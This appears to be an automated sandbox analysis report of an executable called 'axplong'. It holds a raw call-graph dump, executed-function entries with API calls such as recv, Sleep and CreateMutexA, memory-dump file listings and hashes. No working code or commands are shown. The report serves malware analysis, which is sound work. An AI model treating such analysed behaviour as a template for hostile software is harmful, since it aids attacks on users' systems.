10548->10547 10553 673167 std::invalid_argument::invalid_argument 10548->10553 10556 68c5dc GetSystemTimePreciseAsFileTime 10548->10556 10549->10550 10551 68c19a 4 API calls 10550->10551 10551->10552 10552->10553 10554 68c19a 4 API calls 10552->10554 10555 67319d 10554->10555 10556->10545 10593 675500 10594 675520 10593->10594 10595 672280 3 API calls 10594->10595 10596 675620 std::invalid_argument::invalid_argument 10594->10596 10595->10594 10616 672dc0 10617 672de8 10616->10617 10618 68c5bb __Mtx_init_in_situ 2 API calls 10617->10618 10619 672df3 10618->10619 10145 68d041 10146 68d052 10145->10146 10147 68d05a 10146->10147 10149 68d0c9 10146->10149 10150 68d0f0 10149->10150 10151 68d0d7 SleepConditionVariableCS 10149->10151 10150->10146 10151->10150 10153 673c4e 10154 673c58 10153->10154 10156 673c65 10154->10156 10161 6723d0 10154->10161 10157 673c8f 10156->10157 10158 6737d0 3 API calls 10156->10158 10159 6737d0 3 API calls 10157->10159 10158->10157 10160 673c9b 10159->10160 10162 6723e4 10161->10162 10165 68b45d 10162->10165 10173 6a3a1a 10165->10173 10167 6723ea 10167->10156 10168 68b4d5 ___std_exception_copy 10180 68b0dd 10168->10180 10169 68b4c8 10176 68ae86 10169->10176 10184 6a4e59 10173->10184 10175 68b485 10175->10167 10175->10168 10175->10169 10177 68aecf ___std_exception_copy 10176->10177 10179 68aee2 shared_ptr 10177->10179 10190 68b2cf 10177->10190 10179->10167 10181 68b108 10180->10181 10183 68b111 shared_ptr 10180->10183 10182 68b2cf 4 API calls 10181->10182 10182->10183 10183->10167 10185 6a4e5e __cftof 10184->10185 10185->10175 10186 6ad4f4 __cftof 3 API calls 10185->10186 10189 6a8abf __cftof 10185->10189 10186->10189 10187 6a651d __cftof 3 API calls 10188 6a8af2 10187->10188 10189->10187 10191 68be0f InitOnceExecuteOnce 10190->10191 10192 68b311 10191->10192 10193 68b318 10192->10193 10201 6a6beb 10192->10201 10193->10179 10195 68b34e 10196 68be0f InitOnceExecuteOnce 10195->10196 10197 68b391 10196->10197 10198 68b398 10197->10198 10199 6a6beb 3 API calls 10197->10199 10198->10179 10200 68b3ce 10199->10200 10200->10179 10202 6a6bf7 __dosmaperr 10201->10202 10203 6aa531 __cftof 3 API calls 10202->10203 10208 6a6bfc 10203->10208 10204 6a8aaf __cftof 3 API calls 10205 6a6c26 10204->10205 10206 6a6c35 10205->10206 10210 6a68bd 10205->10210 10206->10195 10208->10204 10209 6a6c5d ___free_lconv_mon 10209->10195 10213 6a683a 10210->10213 10212 6a68cf 10212->10209 10214 6a685a 10213->10214 10215 6a6851 10213->10215 10214->10215 10216 6aa531 __cftof 3 API calls 10214->10216 10215->10212 10217 6a687a 10216->10217 10221 6ab4bb 10217->10221 10222 6ab4ce 10221->10222 10223 6a6890 10221->10223 10222->10223 10229 6af46b 10222->10229 10225 6ab4e8 10223->10225 10226 6ab4fb 10225->10226 10228 6ab510 10225->10228 10226->10228 10236 6ae571 10226->10236 10228->10215 10230 6af477 __dosmaperr 10229->10230 10231 6aa531 __cftof 3 API calls 10230->10231 10233 6af480 __cftof __dosmaperr 10231->10233 10232 6af4c6 10232->10223 10233->10232 10234 6a8aaf __cftof 3 API calls 10233->10234 10235 6af4eb 10234->10235 10237 6aa531 __cftof 3 API calls 10236->10237 10238 6ae57b 10237->10238 10241 6ae489 10238->10241 10240 6ae581 10240->10228 10244 6ae495 __cftof __dosmaperr ___free_lconv_mon 10241->10244 10242 6ae4b6 10242->10240 10243 6a8aaf __cftof GetPEB ExitProcess GetPEB 10245 6ae528 10243->10245 10244->10242 10244->10243 10246 6ae564 10245->10246 10247 6aa5ee __cftof GetPEB ExitProcess GetPEB 10245->10247 10246->10240 10248 6ae555 10247->10248 10249 6ae370 __cftof GetPEB ExitProcess GetPEB 10248->10249 10249->10246 10696 67cb8d 10704 67cb98 shared_ptr 10696->10704 10697 67cd1d shared_ptr std::invalid_argument::invalid_argument 10698 675b20 3 API calls 10698->10704 10699 67cd45 10701 675b20 3 API calls 10699->10701 10702 67cdad 10701->10702 10709 67c990 10702->10709 10704->10697 10704->10698 10704->10699 10705 678f60 10704->10705 10706 678fb0 10705->10706 10707 675b20 3 API calls 10706->10707 10708 678fca shared_ptr std::invalid_argument::invalid_argument 10707->10708 10708->10704 10717 67c9fd 10709->10717 10710 67cd1d shared_ptr std::invalid_argument::invalid_argument 10711 675b20 3 API calls 10711->10717 10712 678f60 3 API calls 10712->10717 10713 67cd45 10714 675b20 3 API calls 10713->10714 10715 67cdad 10714->10715 10716 67c990 3 API calls 10715->10716 10717->10710 10717->10711 10717->10712 10717->10713 10268 679a0c 10269 679a1a 10268->10269 10273 679a2e shared_ptr 10268->10273 10270 67a847 10269->10270 10269->10273 10271 67a883 Sleep CreateMutexA 10270->10271 10272 67a8be 10271->10272 10282 675b20 10273->10282 10275 679aac 10298 678a60 10275->10298 10277 679abd 10278 675b20 3 API calls 10277->10278 10279 679be1 10278->10279 10280 678a60 3 API calls 10279->10280 10281 679bf2 10280->10281 10284 675b64 __cftof 10282->10284 10283 675c27 shared_ptr std::invalid_argument::invalid_argument 10283->10275 10284->10283 10285 675b20 3 API calls 10284->10285 10286 67667c 10285->10286 10287 675b20 3 API calls 10286->10287 10288 676681 10287->10288 10308 672280 10288->10308 10290 676699 shared_ptr 10291 675b20 3 API calls 10290->10291 10292 67670d 10291->10292 10293 672280 3 API calls 10292->10293 10295 676727 shared_ptr 10293->10295 10294 675b20 3 API calls 10294->10295 10295->10294 10296 672280 3 API calls 10295->10296 10297 676822 shared_ptr std::invalid_argument::invalid_argument 10295->10297 10296->10295 10297->10275 10299 678aac 10298->10299 10300 675b20 3 API calls 10299->10300 10302 678ac7 shared_ptr 10300->10302 10301 678c31 shared_ptr std::invalid_argument::invalid_argument 10301->10277 10302->10301 10303 675b20 3 API calls 10302->10303 10305 678cca shared_ptr 10303->10305 10304 678dae shared_ptr std::invalid_argument::invalid_argument 10304->10277 10305->10304 10306 675b20 3 API calls 10305->10306 10307 678e4a shared_ptr std::invalid_argument::invalid_argument 10306->10307 10307->10277 10311 672240 10308->10311 10312 672256 10311->10312 10315 6a8667 10312->10315 10318 6a7456 10315->10318 10317 672264 10317->10290 10319 6a7496 10318->10319 10321 6a747e __cftof __dosmaperr std::invalid_argument::invalid_argument 10318->10321 10320 6a683a __cftof 3 API calls 10319->10320 10319->10321 10322 6a74ae 10320->10322 10321->10317 10324 6a7a11 10322->10324 10326 6a7a22 10324->10326 10325 6a7a31 __cftof __dosmaperr 10325->10321 10326->10325 10331 6a7fb5 10326->10331 10336 6a7c0f 10326->10336 10341 6a7c35 10326->10341 10351 6a7d83 10326->10351 10332 6a7fbe 10331->10332 10333 6a7fc5 10331->10333 10360 6a799d 10332->10360 10333->10326 10335 6a7fc4 10335->10326 10337 6a7c18 10336->10337 10339 6a7c1f 10336->10339 10338 6a799d 3 API calls 10337->10338 10340 6a7c1e 10338->10340 10339->10326 10340->10326 10343 6a7c56 __cftof __dosmaperr 10341->10343 10344 6a7c3c 10341->10344 10342 6a7db6 10349 6a7dc4 10342->10349 10350 6a7dd8 10342->10350 10378 6a808e 10342->10378 10343->10326 10344->10342 10344->10343 10346 6a7def 10344->10346 10344->10349 10346->10350 10374 6a81dd 10346->10374 10349->10350 10382 6a8537 10349->10382 10350->10326 10352 6a7db6 10351->10352 10353 6a7d9c 10351->10353 10355 6a7dd8 10352->10355 10356 6a808e 3 API calls 10352->10356 10359 6a7dc4 10352->10359 10353->10352 10354 6a7def 10353->10354 10353->10359 10354->10355 10357 6a81dd 3 API calls 10354->10357 10355->10326 10356->10359 10357->10359 10358 6a8537 3 API calls 10358->10355 10359->10355 10359->10358 10361 6a79af __dosmaperr 10360->10361 10364 6a8979 10361->10364 10363 6a79d2 __dosmaperr 10363->10335 10365 6a8994 10364->10365 10368 6a86d7 10365->10368 10367 6a899e 10367->10363 10369 6a86e9 10368->10369 10370 6a683a __cftof GetPEB ExitProcess GetPEB 10369->10370 10373 6a86fe __cftof __dosmaperr 10369->10373 10372 6a872e 10370->10372 10371 6a8925 GetPEB ExitProcess GetPEB 10371->10372 10372->10371 10372->10373 10373->10367 10375 6a81f8 10374->10375 10376 6a822a 10375->10376 10386 6ac65f 10375->10386 10376->10349 10379 6a80a7 10378->10379 10393 6ad199 10379->10393 10381 6a815a 10381->10349 10383 6a85aa std::invalid_argument::invalid_argument 10382->10383 10384 6a8554 10382->10384 10383->10350 10384->10383 10385 6ac65f __cftof 3 API calls 10384->10385 10385->10384 10389 6ac504 10386->10389 10388 6ac677 10388->10376 10390 6ac514 10389->10390 10391 6a683a __cftof GetPEB ExitProcess GetPEB 10390->10391 10392 6ac519 __cftof __dosmaperr 10390->10392 10391->10392 10392->10388 10394 6ad1bf 10393->10394 10405 6ad1a9 __cftof __dosmaperr 10393->10405 10395 6ad256 10394->10395 10396 6ad25b 10394->10396 10394->10405 10398 6ad27f 10395->10398 10399 6ad2b5 10395->10399 10406 6ac9b0 10396->10406 10401 6ad29d 10398->10401 10402 6ad284 10398->10402 10423 6accc9 10399->10423 10419 6aceb3 10401->10419 10412 6ad00f 10402->10412 10405->10381 10407 6ac9c2 10406->10407 10408 6a683a __cftof GetPEB ExitProcess GetPEB 10407->10408 10409 6ac9d6 10408->10409 10410 6accc9 GetPEB ExitProcess GetPEB 10409->10410 10411 6ac9de __alldvrm __cftof __dosmaperr _strrchr 10409->10411 10410->10411 10411->10405 10415 6ad03d 10412->10415 10413 6ad076 10413->10405 10414 6ad0af 10416 6acd6b GetPEB ExitProcess GetPEB 10414->10416 10415->10413 10415->10414 10417 6ad088 10415->10417 10416->10413 10418 6acf3e GetPEB ExitProcess GetPEB 10417->10418 10418->10413 10420 6acee0 10419->10420 10421 6acf1f 10420->10421 10422 6acf3e GetPEB ExitProcess GetPEB 10420->10422 10421->10405 10422->10421 10424 6acce1 10423->10424 10425 6acd46 10424->10425 10426 6acd6b GetPEB ExitProcess GetPEB 10424->10426 10425->10405 10426->10425 10557 6a8a81 10558 6a86d7 3 API calls 10557->10558 10559 6a8a9f 10558->10559 10486 679ad5 10487 679ad7 10486->10487 10488 675b20 3 API calls 10487->10488 10489 679be1 10488->10489 10490 678a60 3 API calls 10489->10490 10491 679bf2 10490->10491 9975 6a6559 9978 6a63f7 9975->9978 9979 6a6405 __cftof 9978->9979 9980 6a6450 9979->9980 9983 6a645b 9979->9983 9982 6a645a 9989 6aa1c2 GetPEB 9983->9989 9985 6a6465 9986 6a646a GetPEB 9985->9986 9987 6a647a __cftof 9985->9987 9986->9987 9988 6a6492 ExitProcess 9987->9988 9990 6aa1dc __cftof 9989->9990 9990->9985 10492 672ad0 10493 672adc 10492->10493 10494 672ada 10492->10494 10495 68c19a 4 API calls 10493->10495 10496 672ae2 10495->10496 10570 672b50 10571 672b8e 10570->10571 10572 68b72b TpReleaseWork 10571->10572 10573 672b9b shared_ptr std::invalid_argument::invalid_argument 10572->10573 10620 67dfd0 recv 10621 67e032 recv 10620->10621 10622 67e067 recv 10621->10622 10623 67e0a1 10622->10623 10624 67e1c3 std::invalid_argument::invalid_argument 10623->10624 10625 68c5dc GetSystemTimePreciseAsFileTime 10623->10625 10626 67e1fe 10625->10626 10627 68c19a 4 API calls 10626->10627 10628 67e268 10627->10628 10574 673f5f 10575 673f76 10574->10575 10576 673f6d 10574->10576 10577 6723d0 4 API calls 10576->10577 10577->10575 10597 67211a 10598 68c62c InitializeCriticalSectionEx 10597->10598 10599 672124 10598->10599

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 006A645B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 342 6a645b-6a6468 call 6aa1c2 345 6a648a-6a649c call 6a649d ExitProcess 342->345 346 6a646a-6a6478 GetPEB 342->346 346->345 347 6a647a-6a6489 346->347 347->345
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32(?,?,006A645A,?,?,?,?,?,006A74AE), ref: 006A6497
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                                                                                                                    • Opcode ID: f306f1874903e2206229f6ce9f21360c1389639a9b44b5470415ef843c2b25c6
                                                                                                                                                                                                                                                    • Instruction ID: 851288bf9369d31d1b9d0a2e2d7754a3db13863c481d03950ee4884d3b87a605
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f306f1874903e2206229f6ce9f21360c1389639a9b44b5470415ef843c2b25c6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09E08C30250B086FCF397B18D90CE9C3BABEB56344F088819F80846231CB69ED82CD80
                                                                                                                                                                                                                                                    Function 00679AD5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0067A893
                                                                                                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,006D3224), ref: 0067A8B1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                    • String ID: $2m
                                                                                                                                                                                                                                                    • API String ID: 1464230837-511082170
                                                                                                                                                                                                                                                    • Opcode ID: ec8bd58a1ea96310a91c3577b6cd87d364e67d26ea2c40359ec6cd51215b2622
                                                                                                                                                                                                                                                    • Instruction ID: c013ed194979a42cec069b2eda5d0b715d9de79bb580a3fbe6eaf9477b6ce288
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec8bd58a1ea96310a91c3577b6cd87d364e67d26ea2c40359ec6cd51215b2622
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E9314E71B011009BEB189B78EC89BAEB7B7DFC6320F20C25DE4189B3D6D77559818762
                                                                                                                                                                                                                                                    Function 00679E74 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 22 679e74-679e94 26 679e96-679ea2 22->26 27 679ec2-679ede 22->27 28 679ea4-679eb2 26->28 29 679eb8-679ebf call 68d593 26->29 30 679ee0-679eec 27->30 31 679f0c-679f2b 27->31 28->29 32 67a85b 28->32 29->27 34 679f02-679f09 call 68d593 30->34 35 679eee-679efc 30->35 36 679f2d-679f39 31->36 37 679f59-67a846 call 687f30 31->37 39 67a883-67a8c4 Sleep CreateMutexA 32->39 40 67a85b call 6a6b9a 32->40 34->31 35->32 35->34 43 679f4f-679f56 call 68d593 36->43 44 679f3b-679f49 36->44 51 67a8d7-67a8d8 39->51 52 67a8c6-67a8c8 39->52 40->39 43->37 44->32 44->43 52->51 54 67a8ca-67a8d5 52->54 54->51
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0067A893
                                                                                                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,006D3224), ref: 0067A8B1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
